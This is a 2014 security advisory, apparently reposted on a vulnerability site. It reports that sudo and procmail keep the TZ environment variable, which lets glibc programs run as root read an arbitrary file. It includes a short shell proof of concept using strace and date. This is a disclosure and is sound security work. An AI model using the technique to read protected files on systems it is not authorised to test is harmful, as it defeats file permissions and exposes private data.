Abusing TZ for fun (and little profit)

Published
Credit
Risk
2014.10.17
Jakub Wilk
Low
CWE
CVE
Local
Remote
N/A
N/A
Yes
No

By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC:


$ echo moo > tz
$ chmod 0 tz
$ cat tz
cat: tz: Permission denied
$ TZ=$PWD/tz sudo -u root strace -e read date
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
read(3, "moo\n", 4096) = 4
read(3, "", 4096) = 0
Wed Oct 15 20:42:42 2014
+++ exited with 0 +++


Procmail is another program that recklessly whitelists TZ[2].


[1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
[2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13

--
Jakub Wilk

References:

https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com